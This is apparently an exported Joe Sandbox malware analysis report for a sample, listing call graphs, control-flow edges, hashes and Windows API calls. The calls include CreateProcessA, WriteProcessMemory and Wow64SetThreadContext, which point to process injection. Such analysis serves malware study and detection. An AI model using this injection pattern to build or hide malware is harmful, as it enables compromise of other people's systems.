28312->28320 28324 944879 28312->28324 28317 943e3f 28316->28317 28332 945c44 28317->28332 28319 947018 28319->28309 28322 9448af 28320->28322 28321 94498c 28321->28321 28322->28321 28328 9444b4 28322->28328 28326 9448af 28324->28326 28325 94498c 28325->28325 28326->28325 28327 9444b4 CreateActCtxA 28326->28327 28327->28325 28329 945918 CreateActCtxA 28328->28329 28331 9459db 28329->28331 28333 945c4f 28332->28333 28336 945c64 28333->28336 28335 9470bd 28335->28319 28337 945c6f 28336->28337 28340 945c94 28337->28340 28339 94719a 28339->28335 28341 945c9f 28340->28341 28344 945cc4 28341->28344 28343 94728d 28343->28339 28345 945ccf 28344->28345 28346 948330 28345->28346 28353 9485d9 28345->28353 28348 94858b 28346->28348 28359 94ac3b 28346->28359 28347 9485c9 28347->28343 28348->28347 28363 94cd37 28348->28363 28368 94cd38 28348->28368 28354 94858e 28353->28354 28356 9485e7 28353->28356 28355 9485c9 28354->28355 28357 94cd37 GetModuleHandleW 28354->28357 28358 94cd38 GetModuleHandleW 28354->28358 28355->28346 28356->28346 28357->28355 28358->28355 28373 94ac70 28359->28373 28376 94ac5f 28359->28376 28360 94ac4e 28360->28348 28364 94cd59 28363->28364 28365 94cd7d 28364->28365 28385 94cee7 28364->28385 28389 94cee8 28364->28389 28365->28347 28369 94cd59 28368->28369 28370 94cd7d 28369->28370 28371 94cee7 GetModuleHandleW 28369->28371 28372 94cee8 GetModuleHandleW 28369->28372 28370->28347 28371->28370 28372->28370 28380 94ad68 28373->28380 28374 94ac7f 28374->28360 28377 94ac70 28376->28377 28379 94ad68 GetModuleHandleW 28377->28379 28378 94ac7f 28378->28360 28379->28378 28381 94ad9c 28380->28381 28382 94ad79 28380->28382 28381->28374 28382->28381 28383 94afa0 GetModuleHandleW 28382->28383 28384 94afcd 28383->28384 28384->28374 28386 94cef5 28385->28386 28388 94cf2f 28386->28388 28393 94baa0 28386->28393 28388->28365 28390 94cef5 28389->28390 28391 94cf2f 28390->28391 28392 94baa0 GetModuleHandleW 28390->28392 28391->28365 28392->28391 28394 94baab 28393->28394 28396 94dc48 28394->28396 28397 94d29c 28394->28397 28398 94d2a7 28397->28398 28399 945cc4 GetModuleHandleW 28398->28399 28400 94dcb7 28399->28400 28400->28396

                                                                        Executed Functions

                                                                        Function 06A134B8 Relevance: 5.6, Strings: 4, Instructions: 562COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 451 6a134b8-6a134e0 452 6a134e2 451->452 453 6a134e7-6a135a3 451->453 452->453 456 6a135a5-6a135a6 453->456 457 6a135a8-6a135b5 453->457 458 6a135c7-6a135cb 456->458 457->456 457->458 459 6a135d1-6a135fb 458->459 460 6a13abb-6a13afd 458->460 463 6a13601-6a13619 459->463 464 6a13cc8-6a13cd4 459->464 469 6a13b00-6a13b04 460->469 465 6a13cda-6a13ce3 463->465 466 6a1361f-6a13620 463->466 464->465 472 6a13ce9-6a13cf5 465->472 468 6a13cae-6a13cba 466->468 470 6a13cc0-6a13cc7 468->470 471 6a13625-6a13631 468->471 473 6a136d6-6a136da 469->473 474 6a13b0a-6a13b10 469->474 477 6a13633 471->477 478 6a13638-6a13653 471->478 483 6a13cfb-6a13d07 472->483 475 6a136ec-6a136f2 473->475 476 6a136dc-6a136ea 473->476 474->460 479 6a13b12-6a13b6d 474->479 481 6a13737-6a1373b 475->481 480 6a1374a-6a1377c 476->480 477->478 478->472 482 6a13659-6a1367e 478->482 498 6a13ba4-6a13bce 479->498 499 6a13b6f-6a13ba2 479->499 504 6a137a6 480->504 505 6a1377e-6a1378a 480->505 484 6a136f4-6a13700 481->484 485 6a1373d 481->485 482->483 496 6a13684-6a13686 482->496 491 6a13d0d-6a13d14 483->491 488 6a13702 484->488 489 6a13707-6a1370f 484->489 492 6a13740-6a13744 485->492 488->489 494 6a13711-6a13725 489->494 495 6a13734 489->495 492->480 497 6a136bc-6a136d3 492->497 501 6a13689-6a13694 494->501 502 6a1372b-6a13732 494->502 495->481 496->501 497->473 512 6a13bd7-6a13c56 498->512 499->512 501->491 506 6a1369a-6a136b7 501->506 502->485 511 6a137ac-6a137d9 504->511 508 6a13794-6a1379a 505->508 509 6a1378c-6a13792 505->509 506->492 513 6a137a4 508->513 509->513 518 6a13828-6a138bb 511->518 519 6a137db-6a13813 511->519 527 6a13c5d-6a13c70 512->527 513->511 534 6a138c4-6a138c5 518->534 535 6a138bd 518->535 526 6a13c7f-6a13c84 519->526 528 6a13c86-6a13c94 526->528 529 6a13c9b-6a13cab 526->529 527->526 528->529 529->468 536 6a13916-6a1391c 534->536 535->534 537 6a138c7-6a138e6 536->537 538 6a1391e-6a139e0 536->538 539 6a138e8 537->539 540 6a138ed-6a13913 537->540 549 6a13a21-6a13a25 538->549 550 6a139e2-6a13a1b 538->550 539->540 540->536 551 6a13a27-6a13a60 549->551 552 6a13a66-6a13a6a 549->552 550->549 551->552 554 6a13aab-6a13aaf 552->554 555 6a13a6c-6a13aa5 552->555 554->479 556 6a13ab1-6a13ab9 554->556 555->554 556->469
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'tq$:$pxq$~
                                                                        • API String ID: 0-2366959149
                                                                        • Opcode ID: de6192c830d933e678701291d3695d825ef4b506e3abdf8ecb17c525dec7c067
                                                                        • Instruction ID: 1164d07cf7e72dc05e63124e30c043240618ef5904e31a6fcbf56d50ba9587fa
                                                                        • Opcode Fuzzy Hash: de6192c830d933e678701291d3695d825ef4b506e3abdf8ecb17c525dec7c067
                                                                        • Instruction Fuzzy Hash: CF42D175E00228DFDF55DFA9C980B99BBB2FF89300F1580E9E509AB261D731A991CF50
                                                                        Function 06A12106 Relevance: 1.8, Strings: 1, Instructions: 562COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 663 6a12106-6a1210a 664 6a1210b-6a12120 663->664 665 6a12acd-6a12ae3 663->665 664->665 666 6a12121-6a1212c 664->666 668 6a12132-6a1213e 666->668 669 6a1214a-6a12159 668->669 671 6a121b8-6a121bc 669->671 672 6a121c2-6a121cb 671->672 673 6a12264-6a122ce 671->673 674 6a121d1-6a121e7 672->674 675 6a120c6-6a120d2 672->675 673->665 711 6a122d4-6a1281b 673->711 681 6a12239-6a1224b 674->681 682 6a121e9-6a121ec 674->682 675->665 677 6a120d8-6a120e4 675->677 679 6a120e6-6a120fa 677->679 680 6a1215b-6a12161 677->680 679->680 690 6a120fc-6a12105 679->690 680->665 683 6a12167-6a1217f 680->683 691 6a12251-6a12261 681->691 692 6a12a0c-6a12ac2 681->692 682->665 685 6a121f2-6a1222f 682->685 683->665 694 6a12185-6a121ad 683->694 685->673 707 6a12231-6a12237 685->707 690->663 692->665 694->671 707->681 707->682 789 6a12832-6a128c5 711->789 790 6a1281d-6a12827 711->790 791 6a128d0-6a12963 789->791 790->791 792 6a1282d 790->792 793 6a1296e-6a12a01 791->793 792->793 793->692
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D
                                                                        • API String ID: 0-2746444292
                                                                        • Opcode ID: 40f7db8e7f6adaeccd10a9c29db9389d093aaccfad2dcc1e078b538f39958aba
                                                                        • Instruction ID: 365741d0c9eb27da7713e86fdcdb2b99368fd164c407c9f92dc82db240144a7a
                                                                        • Opcode Fuzzy Hash: 40f7db8e7f6adaeccd10a9c29db9389d093aaccfad2dcc1e078b538f39958aba
                                                                        • Instruction Fuzzy Hash: E152E774A002299FDB64DF68C898B9DB7B6FF89300F1041D9D50AAB365DB34AE81CF51
                                                                        Function 06A12C38 Relevance: 7.9, Strings: 6, Instructions: 433COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 294 6a12c38-6a12c4a 295 6a12c53-6a12c5f 294->295 296 6a12c4c-6a12c4e 294->296 299 6a12c61-6a12c63 295->299 300 6a12c68-6a12c7d 295->300 297 6a12d26-6a12d2b 296->297 299->297 303 6a12c91-6a12c9d 300->303 304 6a12c7f-6a12c8a 300->304 307 6a12caa-6a12cac 303->307 308 6a12c9f-6a12ca8 303->308 304->303 309 6a12cbc-6a12cc0 307->309 310 6a12cae-6a12cba 307->310 308->307 312 6a12cc2-6a12ccc 309->312 313 6a12cce-6a12cd0 309->313 310->309 316 6a12cd2-6a12cdc 310->316 317 6a12d38-6a12d44 312->317 313->297 319 6a12d2c-6a12d36 316->319 320 6a12cde-6a12cea 316->320 322 6a12d51-6a12d53 317->322 323 6a12d46-6a12d4f 317->323 319->317 326 6a12cfc-6a12cfe 320->326 327 6a12cec-6a12cfa 320->327 322->297 323->297 326->297 327->326 330 6a12d00-6a12d06 327->330 331 6a12d08 330->331 332 6a12d0a 330->332 333 6a12d0c-6a12d0e 331->333 332->333 334 6a12d10-6a12d1c 333->334 335 6a12d55-6a12de1 333->335 334->335 338 6a12d1e 334->338 348 6a12de3-6a12ded 335->348 349 6a12def-6a12e0b 335->349 338->297 348->349 352 6a12e28-6a12e3c 348->352 355 6a12e23-6a12e25 349->355 356 6a12e0d-6a12e21 349->356 360 6a12e43-6a12e79 352->360 356->355 356->360 364 6a12e7f-6a12e91 360->364 365 6a12f4e-6a12f51 360->365 367 6a12e93-6a12e96 364->367 368 6a12ea6-6a12ea9 364->368 369 6a12f1b-6a12f21 367->369 370 6a12e9c-6a12e9f 367->370 371 6a12eb9-6a12ebf 368->371 372 6a12eab-6a12eae 368->372 377 6a12f23-6a12f25 369->377 378 6a12f27-6a12f33 369->378 373 6a12ea1 370->373 374 6a12eea-6a12ef0 370->374 379 6a12ec1-6a12ec3 371->379 380 6a12ec5-6a12ed1 371->380 375 6a12eb4 372->375 376 6a12f4a-6a12f4c 372->376 373->376 381 6a12ef2-6a12ef4 374->381 382 6a12ef6-6a12f02 374->382 375->376 376->365 383 6a12f52-6a12fe5 376->383 384 6a12f35-6a12f48 377->384 378->384 385 6a12ed3-6a12ee8 379->385 380->385 386 6a12f04-6a12f19 381->386 382->386 401 6a12fe7 383->401 402 6a12fec-6a13000 383->402 384->376 385->376 386->376 401->402 403 6a130f4 402->403 404 6a13006-6a1300b 402->404 407 6a130fa-6a130fb 403->407 405 6a13011-6a13016 404->405 406 6a130c6 404->406 408 6a13100 405->408 409 6a1301c-6a1301d 405->409 440 6a130c9 call 6a18508 406->440 441 6a130c9 call 6a184fa 406->441 407->404 442 6a13100 call 6a132c1 408->442 443 6a13100 call 6a132d0 408->443 448 6a13020 call 6a13d21 409->448 449 6a13020 call 6a13d30 409->449 450 6a13020 call 6a13d9e 409->450 410 6a130cf-6a130da 418 6a130e3 410->418 419 6a130dc-6a130e0 410->419 411 6a13106-6a13107 411->409 412 6a13026-6a13033 413 6a13039-6a1303d 412->413 414 6a1310c-6a13113 412->414 416 6a13043-6a1305b 413->416 417 6a13118-6a1311f 413->417 414->413 425 6a13061-6a13064 416->425 426 6a13124-6a1312b 416->426 417->416 444 6a130e3 call 6ca4458 418->444 445 6a130e3 call 6ca4449 418->445 420 6a130e2 419->420 421 6a13086-6a13087 419->421 420->418 434 6a1308a call 6a16c28 421->434 435 6a1308a call 6a16c18 421->435 424 6a130e9-6a130f1 436 6a13067 call 6a143b0 425->436 437 6a13067 call 6a143c0 425->437 426->425 427 6a13090-6a1309c 438 6a1309f call 6a17f41 427->438 439 6a1309f call 6a17f50 427->439 428 6a1306d-6a1307a 430 6a13130-6a13137 428->430 431 6a13080 428->431 429 6a130a5-6a130b2 429->418 432 6a130b4 429->432 430->431 431->421 446 6a130b7 call 6a183c8 432->446 447 6a130b7 call 6a183d8 432->447 433 6a130bd-6a130c3 433->406 434->427 435->427 436->428 437->428 438->429 439->429 440->410 441->410 442->411 443->411 444->424 445->424 446->433 447->433 448->412 449->412 450->412
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'tq$4'tq$4'tq$4|yq$4|yq$$tq
                                                                        • API String ID: 0-3472957384
                                                                        • Opcode ID: 02735377681180f62ed144d08c47f7e8b01523822f43635e61c99ffa18a412aa
                                                                        • Instruction ID: e710cf7bb127a4f5372fb239390111bd0fa55ed517ef34ebcb3cb8f3e3929acb
                                                                        • Opcode Fuzzy Hash: 02735377681180f62ed144d08c47f7e8b01523822f43635e61c99ffa18a412aa
                                                                        • Instruction Fuzzy Hash: 14E1C970B142058FDB99AF79D86866E7BF6EF89310B144469E006DF361EB34CE81CB91
                                                                        Function 06CA1164 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 992 6ca1164-6ca1205 995 6ca123e-6ca125e 992->995 996 6ca1207-6ca1211 992->996 1001 6ca1260-6ca126a 995->1001 1002 6ca1297-6ca12c6 995->1002 996->995 997 6ca1213-6ca1215 996->997 998 6ca1238-6ca123b 997->998 999 6ca1217-6ca1221 997->999 998->995 1003 6ca1223 999->1003 1004 6ca1225-6ca1234 999->1004 1001->1002 1005 6ca126c-6ca126e 1001->1005 1012 6ca12c8-6ca12d2 1002->1012 1013 6ca12ff-6ca13b9 CreateProcessA 1002->1013 1003->1004 1004->1004 1006 6ca1236 1004->1006 1007 6ca1270-6ca127a 1005->1007 1008 6ca1291-6ca1294 1005->1008 1006->998 1010 6ca127e-6ca128d 1007->1010 1011 6ca127c 1007->1011 1008->1002 1010->1010 1014 6ca128f 1010->1014 1011->1010 1012->1013 1015 6ca12d4-6ca12d6 1012->1015 1024 6ca13bb-6ca13c1 1013->1024 1025 6ca13c2-6ca1448 1013->1025 1014->1008 1017 6ca12d8-6ca12e2 1015->1017 1018 6ca12f9-6ca12fc 1015->1018 1019 6ca12e6-6ca12f5 1017->1019 1020 6ca12e4 1017->1020 1018->1013 1019->1019 1022 6ca12f7 1019->1022 1020->1019 1022->1018 1024->1025 1035 6ca144a-6ca144e 1025->1035 1036 6ca1458-6ca145c 1025->1036 1035->1036 1037 6ca1450 1035->1037 1038 6ca145e-6ca1462 1036->1038 1039 6ca146c-6ca1470 1036->1039 1037->1036 1038->1039 1040 6ca1464 1038->1040 1041 6ca1472-6ca1476 1039->1041 1042 6ca1480-6ca1484 1039->1042 1040->1039 1041->1042 1043 6ca1478 1041->1043 1044 6ca1496-6ca149d 1042->1044 1045 6ca1486-6ca148c 1042->1045 1043->1042 1046 6ca149f-6ca14ae 1044->1046 1047 6ca14b4 1044->1047 1045->1044 1046->1047 1049 6ca14b5 1047->1049 1049->1049
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CA13A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 06c31042e262581114244f7cabbab6e7b68233688c137c5ba6d34bd7766cd874
                                                                        • Instruction ID: 225ebaee2be562738c0da902fe1efc17bdbf0a1ca23045417a2d1cca6d446417
                                                                        • Opcode Fuzzy Hash: 06c31042e262581114244f7cabbab6e7b68233688c137c5ba6d34bd7766cd874
                                                                        • Instruction Fuzzy Hash: E1A18071D0035A8FEF54CFA8C845BDDBBB2BF49318F088569E808A7240DB759A85CF91
                                                                        Function 06CA1170 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1050 6ca1170-6ca1205 1052 6ca123e-6ca125e 1050->1052 1053 6ca1207-6ca1211 1050->1053 1058 6ca1260-6ca126a 1052->1058 1059 6ca1297-6ca12c6 1052->1059 1053->1052 1054 6ca1213-6ca1215 1053->1054 1055 6ca1238-6ca123b 1054->1055 1056 6ca1217-6ca1221 1054->1056 1055->1052 1060 6ca1223 1056->1060 1061 6ca1225-6ca1234 1056->1061 1058->1059 1062 6ca126c-6ca126e 1058->1062 1069 6ca12c8-6ca12d2 1059->1069 1070 6ca12ff-6ca13b9 CreateProcessA 1059->1070 1060->1061 1061->1061 1063 6ca1236 1061->1063 1064 6ca1270-6ca127a 1062->1064 1065 6ca1291-6ca1294 1062->1065 1063->1055 1067 6ca127e-6ca128d 1064->1067 1068 6ca127c 1064->1068 1065->1059 1067->1067 1071 6ca128f 1067->1071 1068->1067 1069->1070 1072 6ca12d4-6ca12d6 1069->1072 1081 6ca13bb-6ca13c1 1070->1081 1082 6ca13c2-6ca1448 1070->1082 1071->1065 1074 6ca12d8-6ca12e2 1072->1074 1075 6ca12f9-6ca12fc 1072->1075 1076 6ca12e6-6ca12f5 1074->1076 1077 6ca12e4 1074->1077 1075->1070 1076->1076 1079 6ca12f7 1076->1079 1077->1076 1079->1075 1081->1082 1092 6ca144a-6ca144e 1082->1092 1093 6ca1458-6ca145c 1082->1093 1092->1093 1094 6ca1450 1092->1094 1095 6ca145e-6ca1462 1093->1095 1096 6ca146c-6ca1470 1093->1096 1094->1093 1095->1096 1097 6ca1464 1095->1097 1098 6ca1472-6ca1476 1096->1098 1099 6ca1480-6ca1484 1096->1099 1097->1096 1098->1099 1100 6ca1478 1098->1100 1101 6ca1496-6ca149d 1099->1101 1102 6ca1486-6ca148c 1099->1102 1100->1099 1103 6ca149f-6ca14ae 1101->1103 1104 6ca14b4 1101->1104 1102->1101 1103->1104 1106 6ca14b5 1104->1106 1106->1106
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CA13A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: ad4035a3eae8655c5da5501a1429de27ae9fe466c6d0f42536daa72c970a8920
                                                                        • Instruction ID: 3dfb54a172157a17bc49e8961500cd16f1c0704f5886afc468fd270c4c62e2c1
                                                                        • Opcode Fuzzy Hash: ad4035a3eae8655c5da5501a1429de27ae9fe466c6d0f42536daa72c970a8920
                                                                        • Instruction Fuzzy Hash: D2916F71D0075A8FEF54CFA8C845BDDBBB2BF49318F088569E808A7640DB749A85CF91
                                                                        Function 0094AD68 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1107 94ad68-94ad77 1108 94ada3-94ada7 1107->1108 1109 94ad79-94ad86 call 94a08c 1107->1109 1111 94ada9-94adb3 1108->1111 1112 94adbb-94adfc 1108->1112 1115 94ad9c 1109->1115 1116 94ad88 1109->1116 1111->1112 1118 94adfe-94ae06 1112->1118 1119 94ae09-94ae17 1112->1119 1115->1108 1162 94ad8e call 94aff0 1116->1162 1163 94ad8e call 94b000 1116->1163 1118->1119 1120 94ae19-94ae1e 1119->1120 1121 94ae3b-94ae3d 1119->1121 1123 94ae20-94ae27 call 94a098 1120->1123 1124 94ae29 1120->1124 1126 94ae40-94ae47 1121->1126 1122 94ad94-94ad96 1122->1115 1125 94aed8-94af98 1122->1125 1128 94ae2b-94ae39 1123->1128 1124->1128 1157 94afa0-94afcb GetModuleHandleW 1125->1157 1158 94af9a-94af9d 1125->1158 1129 94ae54-94ae5b 1126->1129 1130 94ae49-94ae51 1126->1130 1128->1126 1133 94ae5d-94ae65 1129->1133 1134 94ae68-94ae71 call 94a0a8 1129->1134 1130->1129 1133->1134 1138 94ae73-94ae7b 1134->1138 1139 94ae7e-94ae83 1134->1139 1138->1139 1140 94ae85-94ae8c 1139->1140 1141 94aea1-94aea5 1139->1141 1140->1141 1143 94ae8e-94ae9e call 94a0b8 call 94a0c8 1140->1143 1146 94aeab-94aeae 1141->1146 1143->1141 1148 94aeb0-94aece 1146->1148 1149 94aed1-94aed7 1146->1149 1148->1149 1159 94afd4-94afe8 1157->1159 1160 94afcd-94afd3 1157->1160 1158->1157 1160->1159 1162->1122 1163->1122
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0094AFBE
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1907824447.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_940000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: b098f9d7a53eb60743d94b0b348b780bc0fece07d85313f989de0bf3b61b2fcc
                                                                        • Instruction ID: 850db33b398293eafe9e8aedfbd0958ff534b159f93d2fe6fdaf79c62e6c61ee
                                                                        • Opcode Fuzzy Hash: b098f9d7a53eb60743d94b0b348b780bc0fece07d85313f989de0bf3b61b2fcc
                                                                        • Instruction Fuzzy Hash: 7D713370A00B458FD724DF6AD440B5ABBF5FF88310F008A2DE49ADBA50D735E949CB92
                                                                        Function 0094590C Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1164 94590c-9459d9 CreateActCtxA 1166 9459e2-945a3c 1164->1166 1167 9459db-9459e1 1164->1167 1174 945a3e-945a41 1166->1174 1175 945a4b-945a4f 1166->1175 1167->1166 1174->1175 1176 945a60 1175->1176 1177 945a51-945a5d 1175->1177 1179 945a61 1176->1179 1177->1176 1179->1179
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 009459C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1907824447.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_940000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 85965e4b633f78157eeb8f518e30fd054b55cdbae88dc2e40ce542f929af688a
                                                                        • Instruction ID: 06a677be47e8d43a470b48292f8aab8508788fc39ffe441f247f33658ae98192
                                                                        • Opcode Fuzzy Hash: 85965e4b633f78157eeb8f518e30fd054b55cdbae88dc2e40ce542f929af688a
                                                                        • Instruction Fuzzy Hash: EF41E2B0C00A19CFDB24DFAAC885BCDBBF5BF49314F20815AD408AB251DB756946CF50
                                                                        Function 009444B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1180 9444b4-9459d9 CreateActCtxA 1183 9459e2-945a3c 1180->1183 1184 9459db-9459e1 1180->1184 1191 945a3e-945a41 1183->1191 1192 945a4b-945a4f 1183->1192 1184->1183 1191->1192 1193 945a60 1192->1193 1194 945a51-945a5d 1192->1194 1196 945a61 1193->1196 1194->1193 1196->1196
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 009459C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1907824447.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_940000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: d638b39d9e353a06b07fdfa24a183c2dc93b1c9205cf44048b999bbb2eb54500
                                                                        • Instruction ID: 4793a0e63b63f423c673f85e7b52c5335a27282d17373f31f9ba5e73e5dcac59
                                                                        • Opcode Fuzzy Hash: d638b39d9e353a06b07fdfa24a183c2dc93b1c9205cf44048b999bbb2eb54500
                                                                        • Instruction Fuzzy Hash: 0341C0B0C00B1DCBDB24DFAAC885B9DBBF5BF48314F20856AD408AB252DB756945CF90
                                                                        Function 06CA0EE0 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06CA0F78
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: bf0ea322f5a9d64584c5f0947dd06b018bed84b7b483b8238ffc6a6144693763
                                                                        • Instruction ID: d324c6a4898c98c1b905bd0f6804e311f113d21d2841f656483d77c96ae0206d
                                                                        • Opcode Fuzzy Hash: bf0ea322f5a9d64584c5f0947dd06b018bed84b7b483b8238ffc6a6144693763
                                                                        • Instruction Fuzzy Hash: 102146B19003499FDF10CFA9C885BDEBBF5FF48324F10842AE918A7240D7799940CBA5
                                                                        Function 06CA0EE8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06CA0F78
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: ddef9fbfaec065bebf98ca83d0c7d48dac4e024581d4ce9f52c8a88cfaf35876
                                                                        • Instruction ID: e0f1b498caaefe41cc15f6b980fa1c6cde6cbc5206be8ccd916cb8eddcadcbfb
                                                                        • Opcode Fuzzy Hash: ddef9fbfaec065bebf98ca83d0c7d48dac4e024581d4ce9f52c8a88cfaf35876
                                                                        • Instruction Fuzzy Hash: 4C2127719003499FDB10CFA9C885BDEBBF5FF48324F10842AE918A7240D7799944CBA5
                                                                        Function 06CA0FD0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06CA1058
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: 2e61d44c075279444ba0a171901cfe629d6718dbe227e72f5525eaacfd2059a6
                                                                        • Instruction ID: d66099ecf290bfc5dd802646899a50cbc21c82529c2c8efe4a3c6f34d3c9a5c4
                                                                        • Opcode Fuzzy Hash: 2e61d44c075279444ba0a171901cfe629d6718dbe227e72f5525eaacfd2059a6
                                                                        • Instruction Fuzzy Hash: B32139B1D003599FDB10CFAAC881AEEFBF5FF48320F54842AE558A7240D7799911CBA5
                                                                        Function 06CA0D49 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CA0DCE
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 4f5a4711c2860a36d2f45d2ada5e2022875c269b4f9e3f0caa72e78b08922708
                                                                        • Instruction ID: 5d41602ece168dbf73412572eb778d173af9cd300f3da236ef9a68d8cc6914ed
